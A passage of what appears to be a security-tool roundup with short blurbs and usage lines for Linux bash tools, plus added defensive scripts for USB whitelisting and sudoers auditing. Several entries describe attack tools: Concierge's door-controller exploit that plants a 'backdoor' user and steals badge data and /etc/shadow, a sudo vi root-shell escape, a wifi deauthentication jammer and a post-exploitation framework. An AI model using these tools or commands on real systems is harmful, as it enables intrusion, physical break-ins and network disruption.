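# NO-SERIAL marks a device that exposes no serial attribute.
KNOWN_DEVICES='1d6b:0002 ROOTHUB-PLACEHOLDER
0951:1666 SERIAL-PLACEHOLDER-1
046d:c52b NO-SERIAL'

# Script udev runs for an unknown device (placeholder path, an assumption of this example).
ACTION_SCRIPT='/usr/local/sbin/usb-unknown-device-action'
RULES_END_LABEL='usb_known_end'

# list_usb_devices -> the same inventory format read from sysfs, to whitelist what is
# attached right now (prints nothing on systems without /sys/bus/usb).
list_usb_devices() {
    for dev in /sys/bus/usb/devices/*/; do
        [ -r "$dev/idVendor" ] || continue
        serial=$(cat "$dev/serial" 2>/dev/null)
        echo "$(cat "$dev/idVendor"):$(cat "$dev/idProduct") ${serial:-NO-SERIAL}"
    done
}

# whitelist_rule VENDOR PRODUCT SERIAL -> a rule that jumps past the action for a known device
whitelist_rule() {
    if [ "$3" = NO-SERIAL ]; then
        printf 'ACTION=="add", SUBSYSTEM=="usb", ATTR{idVendor}=="%s", ATTR{idProduct}=="%s", GOTO="%s"\n' \
            "$1" "$2" "$RULES_END_LABEL"
    else
        printf 'ACTION=="add", SUBSYSTEM=="usb", ATTR{idVendor}=="%s", ATTR{idProduct}=="%s", ATTR{serial}=="%s", GOTO="%s"\n' \
            "$1" "$2" "$3" "$RULES_END_LABEL"
    fi
}

# build_rules < inventory -> a complete rules file: whitelist lines first, then the
# catch-all that fires for every other usb_device add event, then the label.
build_rules() {
    while IFS=' ' read -r vp serial; do
        [ -n "$vp" ] || continue
        whitelist_rule "${vp%%:*}" "${vp#*:}" "$serial"
    done
    printf 'ACTION=="add", SUBSYSTEM=="usb", ENV{DEVTYPE}=="usb_device", RUN+="%s"\n' "$ACTION_SCRIPT"
    printf 'LABEL="%s"\n' "$RULES_END_LABEL"
}

# Rules for the constructed inventory; on a real host they would be written to a file
# under /etc/udev/rules.d/ and activated with "udevadm control --reload".
printf '%s\n' "$KNOWN_DEVICES" | build_rules
```

Order matters: udev evaluates rules top to bottom, so the GOTO lines for known devices must precede the RUN line, and the catch-all is restricted to DEVTYPE usb_device so that the interface sub-events of a known device do not trigger it a second time. A device without a serial can only be matched on vendor and product, which is weaker; that is why usbdeath's use of name and serial where available matters.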

usbdeath


Dependencies:
* bash
* modern linux os with udev and probably systemd

Usage and download from git:

git clone https://github.com/trpt/usbdeath && cd usbdeath
or wget https://github.com/trpt/usbdeath/blob/master/usbdeath
chmod a+x usbdeath
./usbdeath

Source: https://github.com/trpt

Concierge – A collection (eventually) of Physical Access Control and Monitoring attacks and utilities.


Concierge is a collection (eventually) of Physical Access Control and Monitoring attacks and utilities. These will all eventually evolve into a more effective and user-friendly set of tools, but for now, simple bash scripts will do the job.

Dependencies:
+ Any Linux machine
+ Nmap
+ git

Main scripts:
* eh400.sh
Usage: ./eh400.sh <action>
Actions: exploit, cleanup
All necessary variables will be entered during execution of the script.
exploit: Leverages command injection vulnerability to:
+ Modify .htpasswd file to a known password value for “admin” user. This allows manual control via http(s).
+ Pushes remote agent script to the EH400 (used by triggeragent.sh). This allows for control via cmdline.
+ Pulls IdentDB badge store and /etc/shadow from EH400.
+ Also checks /etc/shadow for known default password values.
cleanup: Removes all copied or created files and restores the original htpasswd file.

* vertx.sh
Usage: ./vertx.sh <action>
Actions: exploit, cleanup
All necessary variables will be entered during execution of the script.
exploit: Leverages command injection vulnerability to:
+ Creates new user, ‘z’, with password ‘backdoor’, and grants web access privs. This allows manual control via http(s).
+ Pushes remote agent script to the VertX EVO (used by triggeragent.sh). This allows for control via cmdline.
+ Pulls IdentDB badge store and /etc/passwd from VertX EVO.
+ Also checks /etc/passwd for known default password values.
cleanup: Removes all copied or created files and deletes the ‘z’ user.

* agentdeploy.sh
Usage: ./agentdeploy.sh <ip> <mac>
This script can be used for both EH400 and VertX EVO door controllers. This is a lighter weight script that only deploys the agent script for use with triggeragent.sh.

* triggeragent.sh
Usage: ./triggeragent.sh <ip> <mac> <action>
Actions: unlock, lock, blink
Example: ./triggeragent.sh 10.1.1.10 00:11:22:33:44:55 unlock
Leverages a previously deployed agent script deployed to lock/unlock a door controller’s associated locking mechanism or blink the LEDs on the associated reader. Further testing against V1000 required.
‘blink’ flashes the LED lights on an associated RFID reader. Used to help locate the exploited door. This has only been tested on HID iClass (and similar) readers, but should work on any reader with external LEDs.

* agentclean.sh
Usage: ./agentclean.sh <ip> <mac>
Removes agent script from targeted door controller. Used to clean up after agentdeploy.sh and triggeragent.sh. If you’ve used eh400.sh or vertx.sh to exploit the targets, use them again with the cleanup action.

* massdeploy.sh

Usage: ./massdeploy.sh <attacker ip> <target(s)> Example: ./massdeploy.sh 10.0.0.1 10.1.1.0/24
All targets must be provided in nmap acceptable format. Currently, input files are not accepted. This script simply automates findings door controllers and deploying agents.

* massclean.sh
Usage: ./massclean.sh <target(s)>
Example: ./massclean.sh 10.10.0.1/24
hid-discoveryd-enum.nse
Usage: nmap -sU -p 4070 --script hid-discoveryd-enum <target(s)>
Simple nmap script that leverages the functionality of the discoveryd service to identify HID EVO door controllers and enumerate system information. This NSE script is located in the tools directory. Simply copy it to nmap’s script directory.

Notes
Testing of these scripts was completed against three separate HID door controllers:
+ Edge EVO EH400
+ VertX EVO V2000
+ VertX EVO V1000
A wiki will be on the way shortly enough to provide more thorough information.

Usage and Download:

git clone https://github.com/lixmk/Concierge && cd Concierge
Now you can run the bash scripts one by one.

Source: https://github.com/lixmk

POOFITEE v0.0.1 – Linux Scripting “Perfect Owner Only Firewall – Invisible To Everyone Else”.


Changelog POOFITEE v0.0.1:
– At first blush, we thought POOFITEE was operational 2016-09-16, but a few bugs remained until 2016-10-01. After 2016-10-01 this “Original” branch is only expected to receive bug fixes of the ruleset, no installer enhancements.
– Tested with Ubuntu server CLI, Linux Mint, Raspberry Pi, and Pine A64 (for which you’ll have to manually load the ipset module for iptables). We expect success with many or most other Linux distros. Future expansion still planned including source code cleanup and screen layout enhancement.

POOFITEE v0.0.1


BULLET-PROOF YOUR “OWNER-ACCESS-ONLY” LINUX SERVER FROM HACKERS WITH IPTABLES AND ROBUST SHELL SCRIPTING.

Bare minimum packages and whitelist-only access to your Linux home surveillance &/or automation system such as NEST or WeMo, or your WiFi router (if port or other forwarding, or external management are in use). ENTERPRISES: Let POOFITEE create the blacklists you need! Run POOFITEE on an external ip address that should have no incoming traffic, then share with your firewalls the ipset blacklist it creates.

No hackers can get any data or communication at all out of your system when this firewalling solution is installed on it:
* Only you know how to get your remote IP address permitted by the whitelist to become an authorized source address. This is done by port knocking or email. Source addresses not whitelisted are ignored as effectively as if they were explicitly blacklisted. All 65536 of your ports are invisible to them.
* Only you know the IP address of your system – it’s emailed to you fresh every time your system’s address is changed by DHCP.
* You will be notified immediately by email/text of any and all source addresses that your system places on its whitelist or removes from its blacklist.
* You would still continue to use passwords and ssh keys as is prudent even for systems without firewall protection.

All this PLUS the simplicity and robustness inherent in a bare iptables and scripting-only Linux solution, PLUS the option of building an explicit blacklist of first-time hacking packets in real-time for your reference and curiosity, if your system has enough RAM.

POOFITEE


Firewalling options this install script should be able to change from the script’s defaults:
— Stop probe logging/blacklisting to save space or if you’re just not curious – comment out the crontab entry and kill the process
— Open specific ports to offer public services
— Force single-interface firewalling even though two interfaces exist
— Alter the IP address of the private-side interface from 192.168.3.1
— Dynamic re-config of interfaces: external may swap with internal, and the private IP on external may become public & vice versa for laptops, etc. Triggered whenever the external interface changes
— Allow installer to specify which internal interface to trust
— accommodate multiple vlans

Why anyone would want a blacklist to accumulate:
1) differentiate between neutral and hostile when providing public services,
2) assist in selecting ports for knock sequence or email knock by which are least probed,
3) just to have a blacklist so admin/owner can blacklist their own choices of Internet addresses,
4) give to other firewall software in a multi-box environment,
5) sales, marketing, winning a bet, or other reasons to prove the point to self or others,
6) curiosity

Usage & Download from git:

git clone https://github.com/kenneth558/POOFITEE-Original && cd POOFITEE-Original
chmod a+x POOFITEE
./POOFITEE

Source: https://github.com/kenneth558 | Our Post Before

create_ap v0.4 – a script that creates a NATed or Bridged WiFi Access Point.


Changelog create_ap v0.4:
+ Bug fixes throughout the script.

create_ap v0.4


create_ap is a script that creates a NATed or bridged WiFi access point.
Features
* Create an AP (Access Point) at any channel.
* Choose one of the following encryptions: WPA, WPA2, WPA/WPA2, Open (no encryption).
* Hide your SSID.
* Disable communication between clients (client isolation).
* IEEE 802.11n & 802.11ac support
* Internet sharing methods: NATed or Bridged or None (no Internet sharing).
* Choose the AP Gateway IP (only for ‘NATed’ and ‘None’ Internet sharing methods).
* You can create an AP with the same interface you are getting your Internet connection.
* You can pass your SSID and password through pipe or through arguments (see examples).

create_ap v0.3


Dependencies
General
+ bash (to run this script)
+ util-linux (for getopt)
+ procps or procps-ng
+ hostapd
+ iproute2
+ iw
+ iwconfig (you only need this if ‘iw’ can not recognize your adapter)
+ haveged (optional)

For ‘NATed’ or ‘None’ Internet sharing method
– dnsmasq
– iptables

Example Use & Download from git:

git clone https://github.com/oblique/create_ap && cd create_ap
make install

ArchLinux:
yaourt -S create_ap

Gentoo:
emerge layman
layman -f -a jorgicio
emerge net-wireless/create_ap


Examples
No passphrase (open network):
create_ap wlan0 eth0 MyAccessPoint

WPA + WPA2 passphrase:
create_ap wlan0 eth0 MyAccessPoint MyPassPhrase

AP without Internet sharing:
create_ap -n wlan0 MyAccessPoint MyPassPhrase

Bridged Internet sharing:
create_ap -m bridge wlan0 eth0 MyAccessPoint MyPassPhrase

Bridged Internet sharing (pre-configured bridge interface):
create_ap -m bridge wlan0 br0 MyAccessPoint MyPassPhrase

Internet sharing from the same WiFi interface:
create_ap wlan0 wlan0 MyAccessPoint MyPassPhrase

Choose a different WiFi adapter driver
create_ap --driver rtl871xdrv wlan0 eth0 MyAccessPoint MyPassPhrase

No passphrase (open network) using pipe:
echo -e "MyAccessPoint" | create_ap wlan0 eth0

WPA + WPA2 passphrase using pipe:
echo -e "MyAccessPoint\nMyPassPhrase" | create_ap wlan0 eth0

Enable IEEE 802.11n
create_ap --ieee80211n --ht_capab '[HT40+]' wlan0 eth0 MyAccessPoint MyPassPhrase

Client Isolation:
create_ap --isolate-clients wlan0 eth0 MyAccessPoint MyPassPhrase

Download: v0.4.zip  | v0.4.tar.gz
Source: https://github.com/oblique | Our Post Before

pwndsh – Post-exploitation framework (and an interactive shell) developed in Bash shell scripting.


pwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. It aims to be cross-platform (Linux, Mac OS X, Solaris etc.) and with little to no external dependencies.
The Post Exploitation Phase with 3 possible plays (not mutually exclusive):
1. Further Penetrate Into the Network/Endpoints
2. Get a firmer foothold on the Network/Endpoint
3. Start Exfiltrating Data Out of the Network/Endpoint

pwndsh


Tested:
* Mac OS X El Capitan (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15)
* Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
* Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11)

Use and download from git:

git clone https://github.com/SafeBreach-Labs/pwndsh && cd pwndsh
cd bin/
./compile_pwnd_sh.sh
ls -la pwnd.sh
source pwnd.sh

Source: https://github.com/SafeBreach-Labs


SysScout – A Network Forensics/Incident Response Tool.


SysScout is a fully encapsulated script that quickly and easily pulls local machine information from Linux-Based systems. A simple, easy to use Incident Response and Network Forensics tool. Unlike other scripts that require installation of dependencies and toolkits, SysScout is ready to deploy on most Linux Distros.

SysScout


Mac Forensicators NOTE: This script works for the most part in MacOS, but not completely (there are some wonky exceptions). You will also need to use a directory besides /opt as this doesn’t exist in HFS+.

Download, setup & usage:

Run these commands in a Linux-Based Terminal
git clone https://github.com/joshbrunty/SysScout /opt/SysScout/
cd /opt/SysScout/
./SysScout.sh

Source: https://github.com/joshbrunty

yodo – Local Privilege Escalation POC.


Yodo is a tool that proves how easy it is to become root via limited sudo permissions or via dirtyc0w.
About the impact of dirtyc0w:
* An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
* This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

yodo


Usage and download:

wget https://github.com/b3rito/yodo/blob/master/yodo.sh
./yodo.sh

Example: If a user has sudo privileges only on vi, he could become root by running this command: sudo vi -c ':shell'
seclist@victim ~/Desktop $ sudo vi -c ':shell'
[sudo] password for seclist:
victim Desktop # whoami
root
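The defender's side of the vi example above: a small sudoers audit, added here as an illustration and not part of yodo, that flags grants on editors able to spawn a shell unless the rule uses sudoedit or the NOEXEC: tag. The sudoers excerpt is constructed; the parser handles the common one-rule-per-line layout only (no aliases or line continuations, and tags are read per command rather than carried across commas), which is an assumption of this example.

```shell
#!/bin/sh
# Audit sudoers rules for the weakness yodo demonstrates: a limited grant on an
# editor that can spawn a shell (sudo vi -c ':shell'). Added example, not yodo's
# code. The excerpt is constructed; the parser handles one rule per line without
# aliases or continuations, and tags are taken per command, not carried across commas.
SAMPLE_SUDOERS='# constructed sample, not from a real host
Defaults env_reset
root    ALL=(ALL:ALL) ALL
seclist ALL=(ALL) /usr/bin/vi
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/vim /etc/backup.conf
editor  ALL=(root) NOEXEC: /usr/bin/vi
ops     ALL=(root) sudoedit /etc/hosts
'

# Editors shown escaping to a shell; sudoedit or the NOEXEC: tag is the usual fix.
SHELL_CAPABLE_EDITORS='vi vim'

# trim STR -> STR without leading or trailing whitespace
trim() {
    v=$1
    v=${v#"${v%%[![:space:]]*}"}
    v=${v%"${v##*[![:space:]]}"}
    printf '%s' "$v"
}

# check_entry USER CMDSPEC -> one "RISK ..." or "OK ..." line
check_entry() {
    user=$1; entry=$(trim "$2"); noexec=0
    # peel off leading tags such as NOPASSWD: or NOEXEC:
    while :; do
        case "$entry" in
            NOEXEC:*) noexec=1; entry=$(trim "${entry#NOEXEC:}") ;;
            NOPASSWD:*|PASSWD:*|EXEC:*|SETENV:*|NOSETENV:*) entry=$(trim "${entry#*:}") ;;
            *) break ;;
        esac
    done
    cmd=${entry%%[[:space:]]*}       # command path, arguments dropped
    base=${cmd##*/}
    case " $SHELL_CAPABLE_EDITORS " in *" $base "*) editor=1 ;; *) editor=0 ;; esac
    if [ "$cmd" = ALL ]; then
        echo "RISK $user $cmd -- unrestricted command grant"
    elif [ "$cmd" = sudoedit ]; then
        echo "OK $user $cmd -- sudoedit edits a temporary copy, no root editor process"
    elif [ "$editor" -eq 1 ] && [ "$noexec" -eq 0 ]; then
        echo "RISK $user $cmd -- editor can spawn a root shell even with fixed arguments; use sudoedit or NOEXEC:"
    elif [ "$editor" -eq 1 ]; then
        echo "OK $user $cmd -- NOEXEC: blocks the shell escape"
    else
        echo "OK $user $cmd"
    fi
}

# audit_sudoers < sudoers -> one line per granted command
audit_sudoers() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*|Defaults*|*_Alias*) continue ;; esac
        user=${line%%[[:space:]]*}
        spec=${line#*=}                  # text after the first '=' (the command list)
        spec=${spec#"("*")"}             # drop the "(runas)" part when present
        printf '%s\n' "$spec" | tr ',' '\n' | while IFS= read -r entry; do
            if [ -n "$(trim "$entry")" ]; then
                check_entry "$user" "$entry"
            fi
        done
    done
}

printf '%s' "$SAMPLE_SUDOERS" | audit_sudoers
```

The backup user's rule is the instructive one: pinning the argument (/usr/bin/vim /etc/backup.conf) does not help, because the shell escape comes from inside the editor, not from its command line. On a real host the input would come from visudo -c -f or the files under /etc/sudoers.d, and the editor list would be extended to whatever interactive programs the local policy allows.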

Source: https://github.com/b3rito

jammer – Jam Wifi Networks That Your Wireless Card Can Reach.


jammer is a Bash script to automate the continuous circular deauthentication of all the wifi networks in your reach. Keep in mind that it is generally illegal to use the script in your neighborhood; it is designed for pen-testing purposes.

jammer v0.4

Dependencies and platform :
+ airmon-ng/aircrack-ng
+ all linux platform support.

Usage:

git clone https://github.com/billpcs/jammer && cd jammer
sudo ./jammer -y -s -d 20 -f whitelist.txt
please edit whitelist.txt before run

Source: https://github.com/billpcs

pentmenu v1.3.1 – A simple bash script for various basic penetration tests.


Disclaimer:
This script is only for responsible, authorised use. You are responsible for your own actions and this script is provided without warranty or guarantee of any kind. The author(s) accept no responsibility or liability on your behalf.

Latest Change pentmenu v1.3.1 7/1/2017:
* reflect latest changes; also add slightly more detail around network recon and stealth scan functions
* can review README.md from menu option.
* minor syntax changes and improvements

Designed to be a simple way to implement various network pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most linux distributions without having to resort to multiple specialist tools.

pentmenu v1.3.1

Requirements:
– bash
– sudo
– curl
– netcat (must support ‘-k’ option, openbsd variant recommended)
– hping3 (or nping can be used as a substitute for flood attacks)
– openssl
– stunnel
– nmap
– whois (not essential but preferred)
– nslookup (or ‘host’)

Usage and download:

wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu
chmod +x pentmenu
./pentmenu

Source: https://github.com/GinjaChris | Our Post Before

lunar – a Unix security auditing and reporting tool.


Introduction:
Lunar is a bash script that generates a scored audit report of a Unix host’s security. It is based on the CIS and other frameworks. Why a shell script? I wanted a tool that was able to run on locked-down systems where other tools may not be available. I also wanted a tool that ran on all versions of UNIX. Having said that, there are some differences between sh and bash, so I’ve used functions only from sh. It can also perform a lockdown. Unlike some other scripts, I have added the capability to back out changes. Files are backed up using cpio to a directory based on the date (see Examples below).

lunar v5.0.5

Supported Operating Systems:
+ Linux
+-+ Red Hat
+-+ Centos
+-+ Scientific Linux
+-+ SLES
+-+ Debian
+-+ Ubuntu
+ Solaris (6,7,8,9,10 and 11)
+ Mac OS X
+ FreeBSD (needs more testing)
+ AIX (needs more testing)
+ ESXi (initial support – some tests)

Latest Changelog lunar v5.0.5 Sat 14 Jan 2017:
+ Fixed code to print module information
+ Fixed audit select function
+ Initial Amazon Linux support
+ Start adding support for Amazon Linux and added vfat to modprobe check

Usage:

git clone https://github.com/lateralblast/lunar && cd lunar
./lunar.sh

Source: https://github.com/lateralblast
